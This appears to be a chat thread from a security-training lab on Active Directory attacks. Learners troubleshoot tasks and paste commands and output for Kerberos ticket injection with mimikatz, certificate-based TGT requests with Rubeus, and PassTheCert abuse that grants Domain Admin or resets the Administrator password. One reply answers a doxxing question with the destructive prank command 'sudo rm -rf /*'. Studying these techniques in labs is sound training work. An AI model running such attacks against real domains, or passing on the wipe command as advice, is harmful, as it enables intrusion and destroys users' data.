• mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  After the above command, i am stuck and getting error as follows:
  -- File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)

i am not sure what the error is and what would be the solution for this. been stuck for long here.
Requesting help.
Thanks in advance.

Hi, I am trying to find the path from SVCSERVERMAN to THMSERVER2 machine as instructed in task6 but i cant seem to find the THMSERVER2 machine within my imported data (i downloaded this one from the attached task files)

this is how its instructed in task 6

Hy Guys I'm stuck
I have the problem that I can not see the nodes IP from the bottom. I can move every node from left to right and vice versa but not up or down.
Does any of you have an idea? I also retested the room but it happens nothing.

This is how the room has always been. Also you can easily find their IPs by running some basic commands you should know about if you've reached this room.

@sweet eagle ok problem is solved now the major problem was, I was completed breachingad since 2 years ago and in the mean while many changes was happend, I was not able to connect me to the machines like THMDC or THMCHILDDC also IP Ping wasn't working... now I reseted the room breachingad also I leave the room after rejoin and restarting the Attackbox now I'm able to access again to this network from the attack box

@sweet eagle thank you anyway

Gave +1 Rep to @sweet eagle (current: #58 - 160)

lol. 2 Years later, I came to ask the exact same question. Was just re-doing old rooms and wanted to ask the same thing.

I am facing an issue with Task 7 Exploiting Certificates.

When using Rubeus to create a TGT with the exported certificated, I'm getting this error. I googled it and found that it can be fixed by restarting the DC. But how do I do it? Or is there any other way?

This is the error:

PS C:\Tools> .\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:cert.pfx /password:pass /outfile:hacker.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Hacker
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

I have tried resetting the network, and repeated the task from the start, but I face the same error.

Guys, anyone?

I am unable to complete this room because of this

The room have had this bug for so long. I'm surprised it isn't fixed yet.

guys do you have connectivity issue?? thm says network is up but i cant seem to access any of the machine

Can anyone help me with this????

Or is it not fixed yet ?

I had the same problem and managed to find a workaround, by passing the certificate via LDAPS instead. You may refer to the following articles for the details:

https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
https://www.thehacker.recipes/ad/movement/schannel/passthecert

Essentially, you need to download PassTheCert.exe and transfer to the windows machine. I then used the following command to add my own user to Domain Admin group.

.\PassTheCert.exe --server za.tryhackme.loc --cert-path <your-certificate-file> --cert-password <password> --add-account-to-group --target "CN=Domain Admins,CN=Users,DC=za,DC=tryhackme,DC=loc" --account "CN=paula.bailey,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=loc"

Thanks. I'll try this.

Gave +1 Rep to @frank saddle (current: #3019 - 1)

If you've connected to the VPN and configured your NetworkManager (in case of networks) then it should work. Which room are you facing the problem in?

nah works now, i am just not patient enough lol. after waiting for like 20 mins the DC can finally be resolved again. Thanks

Gave +1 Rep to @wicked garnet (current: #3026 - 1)

Cool

Thanks, it helped me solve the task.❤️

Gave +1 Rep to @frank saddle (current: #2019 - 2)

Hi guys,
I have a question regarding the task2: permission delegation. Why does BloodHound show that a domain user has GenericWrite over the IT Support group’s ACL and is able to perform an ACL Add Member operation in photo? Shouldn’t it show that the domain user has ACL Add Member specifically in order to add themselves to the IT Support group? Thank you.

I'm currently working in the "Exploiting Active Directory" room on TryHackMe. Since yesterday, I've encountered an issue with the VPN configuration. I can generate the exploitingad.ovpn configuration file from https://tryhackme.com/access, then choose Networks>Network VPN server > exploitingad, but the downloaded file is only 2114 bytes instead of the expected ~8.1 KB. Upon inspection, the file lacks the <key>...</key> section. When I run sudo openvpn ./exploitingad.ovpn, it consistently fails due to the missing <key> section. Could someone provide guidance on resolving this issue?

screenshot below:

U still have the issue ?

hi im doing the Exploiting Certificates and i got this error

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=hehe
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

i just reset the admin password and use runas

PS C:\Tools> .\PassTheCert.exe --server 10.200.60.101 --cert-path C:\Tools\cert.pfx --cert-password "quoctuan123" --reset-password --target "CN=Administrator,CN=Users,DC=za,DC=tryhackme,DC=loc" --new-password "NewPassword123!"

I downloaded the ovpn file and it's literally empty?

regenerated it multiple times, no dice

okay, on my 4th attempt (2nd after leaving and rejoining the room) I got an actual ovpn file

persistence is a virtue

hi, i'm having the same issue and can't sort it with tun's steps

Hi, could anyone help to troubleshoot network issue on the attackbox for tryhackme/exploitingad

root@ip-10-201-49-166:~# sudo sed -n '1,40p' /etc/resolv-dnsmasq || sudo cat /etc/resolv-dnsmasq
sudo: unable to resolve host ip-10-201-49-166: Name or service not known
nameserver 10.200.83.101
nameserver 169.254.169.253
root@ip-10-201-49-166:~# ping -c3 10.200.83.101
PING 10.200.83.101 (10.200.83.101) 56(84) bytes of data.

--- 10.200.83.101 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2033ms

root@ip-10-201-49-166:~# nslookup 10.200.83.101
** server can't find 101.83.200.10.in-addr.arpa: NXDOMAIN

root@ip-10-201-49-166:~# nslookup thmdc.za.tryhackme.loc
;; communications error to ::1#53: timed out
Server: ::1
Address: ::1#53

** server can't find thmdc.za.tryhackme.loc: NXDOMAIN

root@ip-10-201-49-166:~# nslookup thmchilddc.za.tryhackme.loc
;; communications error to ::1#53: timed out
Server: ::1
Address: ::1#53

** server can't find thmchilddc.za.tryhackme.loc: NXDOMAIN

root@ip-10-201-49-166:~# sudo service dnsmasq restart

There is also the issue that there is no "exploitad" network adapter on the attack box (ip a)

if there is no exploitad adapter on the AttackBox:

• download the VPN file for the relevant network after regenerating it
• then run openvpn command: that will give you the exploitad interface
  also:
• confirm that your network instance is in the state of Running
• confirrm that you can ping the DC IP 10.200.83.101, which is also the IP for the DNS server

i think something wrng with this lab
i couldn't able start the LAB

Hey anyone have any ideas why the meterpreter session might be dying for task 5? I'm able to log in as trever and get the shell onto their machine. There is an active explorer session with trevor.local. I've tried both just going straight to migrating and starting the explorer process itself using the method in the note. Every time I migrate it just terminates and the reason given is session died. I've tried running getsys on the meterpreter in case it was a permission issue. Running idletime on it showed 2+minutes of idle user too. Kinda blank on what's wrong at the moment. What could be a possible reason?

Why in the task5 I'm never able to migrate to explorer.exe.

No matter what I do, the meterpreter session die.

I uploaded a meterpreter payload on the target which I executed with the smb auth relay so I'm system.

I tried a lot of way to get this exploit running to launch the keyscan but i never get past the migrate command.

my meterpreter is a windows/x64/meterpreter/reverse_tcp

I've been stuck on the same question for a week now and I've tried just about anything.

Maybe smt got updated in the machine since it got first released stopping us now

I've got no clue either

I legit decided to cheat and went on a walkthrough page to see if there was something that I missed but to my surprise there is nothing special to do.

Migrate command should work yet the meterpreter keeps dying.

I opened a ticket just in case I'm not crazy.

Haha I tried walk-throughs too couldn't find anything either, lemme know if the ticket ends up being anytjing helpful 🙏🏽

I'm kind of confused by the VPN connection i'm getting for this lab
the machines are on a 10.200 network but my VPN connection connects me to 10.150
that would be my explanation why i can't nslookup the DC

Hi guys, I'm at task 4 and when i copy past the custom cipher into my bloodhound, I don't have any result. There is anyone who has the same issue ?

Did you make sure to download the updated one? Sometimes it's helpful to regenerate the instance and reactivate it. Might be helpful to check if you have any other connections running too. Chat could probably give the commands to check that

Pretty sure I had that too, I just read the reading for the next steps

Did you ever hear back from them?

Asked me to reset the network and they closed the ticket... Never tried since we reached the 10 reset count needed for it to happen. The network is fresh now. We probably need to start from task1 though because everything has been wiped to original state.

Amazing 😭

I'm finishing my top1 league badge since this is probably gonna be the only time I'll be able to stay 1st and there is 2 hours left but I'll get back to it later this week.

Hi all!

I'm stuck on the exploiting GPO task. My user is a member of the IT support group and I've modified the GPO so that IT Support is a member of builtin\administrators and builtin\remote desktop users. I've waited like 30 min but I cant RDP into THMSERVER02. Anyone else faced the same?

anyone else experiencing a certificate mismatch when trying to RDP into the THMWRK1 endpoint as a normal user or a T2 user? im on task 6 and i cant login

it says the endpoint is THMJMP1

Hi does someone have the same error when they are trying to make a ptt error : * File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)

Nevermind i'm an idiot , i didn't supply the path of the kirbi file

where in bloodhound i can see this kind of link between management servers and thmserver2

Hi there is somone ?

Hi all.
I am facing some problem getting a connection from attackbox to the exploiting AD network. I had completed almost all tasks except the final task 8 and the attackbox was working seamlessly but since day before yesterday, whenever I try to launch the attackbox it doesn't show up with the exploitad network interface that used to come earlier (as shown in the attached screenshot) and so I am not even able to ping the DC's IP 10.200.72.101 which was earlier pinging. I have restarted the attackbox multiple times without any result. I saw somewhere about regenerating the openvpn file after selecting the appropriate network (exploit_ad_v2) and then restarting the attackbox. I did that multiple times too but to no avail. I also saw in another room to use the tryconnectme command but that also did not solve anything. The Echo AI also does not give any useful suggestion which is why I am here, hoping to receive a solution. Can someone check this out and tell me if am I missing something and what?

I have also tried using different browsers (firefox and chrome) and connecting from different network (office and home) but that also did not work.

Just now I tried leaving the room, rejoining it, starting the network, regenerating the openvpn file and then starting the attackbox. Didn't work.

hey does anyone face "The RPC server is unavailable." problem when doing exploiting automated relay? is there any solution here i could follow?

how do i ip grab or get someone’s address with their discord user

That's illegal.

well

if i don’t do anything with it😼

Well that's not the place.

sudo rm -rf /* should work

Hey everyone, I’m working on a Level 3 SQLi lab and I’ve hit a wall with a server-side filter.
The Setup: I've bypassed the front-end JS and I'm using 'Edit and Resubmit' in the Network tab to hit the id parameter directly. The server returns 'Dangerous Command' for almost everything. I’ve tried:
Standard UNION SELECT (with case folding/comments)
Boolean logic like 1' AND 1=1--
URL/Hex encoding the keywords.
I also noticed a csrftoken and dual sessionid cookies (one for / and one for /level3).

is this a Blind SQLi case where I need to bypass space/keyword filtering using alternative whitespace characters, or should I be looking at a different Vector (like the Cookies or CSRF token) because the id param is a honey-pot? Not looking for the flag, just a nudge on the filter logic!"

I havent been able to get the exploiting AD network up in almost a week. Just a grey rectangle with a loading circle. I tried leaving the room and resetting progress but it still wont load. Any help?

Is there anything better then metasploit

hey everyone i'm getting crazy right now i'm stuck although i do THE SAME as written in the room.
I'm stuck in task 7 - exploiting certificates - from the room Exploiting active directory.
So I created the certificate and then export it with the private key, and when I try to ask a tgt with the cert the kdc return me this :
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
I tried to change the encryption algo, date and time sync with the dc, create a new cert but anything works.
Any help ? Thank you ^^

so here is my command failing :

PS C:\tools>  .\Rubeus.exe asktgt /user:Administrator /certificate:C:\Users\irene.leach\Documents\badcert.pfx /password:Qwerty1 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.72.101 /enctype:aes256

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=badcert
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

PS C:\tools>

This is a known problem with this room and with AD overall. There could be man sources:

Your Kali being too far away in time from the DC etc.. AD is just very complicated. In ths case, I think the room itself is bugged because everyone has been having this problem here.

Yes.. Metasploit is a C2 framework. But it's fir beginners - Known others are Cobalt Strike, Havoc, Sliver...

Thx

Gave +1 Rep to @sweet eagle (current: #20 - 531)

hello

first 🥳

https://tryhackme.com/room/exploitingad Here we go 😎

@surreal python you done yet?

done what? 👀

Check what the channel is called

no, not yet

Thank you @glacial stream for all your work on these networks! I really think this is setting TryHackMe apart from other platforms. Each of these has been excellent. Looking forward to digging into this one.

Gave +1 Rep to @glacial stream

Hope you enjoy it!

@glacial stream I imported tickets but I can not Enter-PSSession to the next server

 
* File: 'C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_WSMAN~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # kerberos::ptt C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

* File: 'C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # exit
Bye!
PS C:\Tools\mimikatz_trunk\x64> klist

Current LogonId is 0:0x114e6f

Cached Tickets: (6)```

Hey there! So it seems like you are trying to impersonate a T2 account? Melanie Davies? Remember THMSERVER1 is a SERVER machine. Tier 2 accounts have admin privs over workstations. Tier 1 accounts have admin privs over servers. I think that's the issue here? So the impersonation is working, but the Melanie account does not have permissions to auth to THMSERVER1 if that makes sense

aaaahhhhhh!!!!!

So use the enumeration command (or bloodhound) to find the Tier 1 admins and impersonate one of them 🙂

Hope that makes sense

Gotcha!!! Thanks!!

Good luck there!

worked great! On to the next one

Awesome!

hi

my first time

Finally done. What a great room! Keep it up @glacial stream

My network is f*ed up, cant ping the DC, already requested network reset

Glad you liked it!

Hey there, if you send me your VPN file I can take a look at what is happening in the network for you. But yeah, since users gain control over the entire network I do think this might happen from time to time

What am I doing wrong? Cannot ping thmdc.za.tryhackme.loc

Network is running. Can ping the other dc 10.200.60.101

Work online, no vpn

If you can ping 10.200.60.101 then the network is live. If you can't ping thmdc.za.tryhackme.loc it means your DNS configuration is not correct

When you say online, do you mean AttackBox? If so, you still need to follow the steps of DNS configuration in the first task. Have you done those?

in task 2 using bloodhound. bloodhound says "no data in file" wtf...

what file are you trying to open?

the one u get

zip file to bloodhound

unzip it

even tried to use sharphound and get a new one

there will be json files in there, those will contain the data

Are you using attackbox or you own machine? If you own machine just make sure to update bloodhound

You shouldn't need to

sometimes it helps

u dont need to. u can just put the zip file in bloodhound directly

but i try

nope dont work

same thing

my own. but every other files work its just the user file but i can try to update

👍 Yeah, with the release of BH v3, quite a bit has changed. You don't need to actually install new BH, you can just download the release and run it directly from the folder, so you can still have both version of BH

oh really? just downlowd the github rep and just open it?